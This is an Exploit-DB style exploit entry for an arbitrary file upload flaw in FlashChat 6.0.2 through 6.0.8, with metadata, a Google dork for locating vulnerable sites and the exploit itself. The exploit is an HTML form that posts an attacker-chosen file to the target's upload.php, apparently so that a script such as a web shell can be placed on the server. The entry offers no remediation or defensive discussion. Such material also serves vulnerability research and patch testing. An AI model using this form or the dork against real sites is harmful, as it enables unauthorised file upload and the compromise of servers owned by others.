FlashChat 6.0.2 < 6.0.8 - Arbitrary File Upload
Author: x-hayben21
type: webapps
platform: php
port: 80.0
date_added: 2013-10-04
date_updated: 2013-10-04
verified: 1
codes: OSVDB-98233
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt29000/screen-shot-2013-10-04-at-35454-pm.png
application_url: http://www.exploit-db.comscript_2.zip
#######################################################
# Exploit Title: FlashChat File Upload Vulnerability
# Google Dork: intitle:FlashChat v6.0.8
# Date: 02.10.2013
# Exploit Author: x-hayben21
# Vendor Homepage: www.punish3r.com
# Software Link: http://www.tufat.com/script2.htm
# Version: v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7,
# Tested on: Windows, PHP 5.2
#
# Special Thanks : MaXtoR - PoLoNia
#######################################################
#Vulnerable File : upload.php
#Exploit
<form action="http://sites/script/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>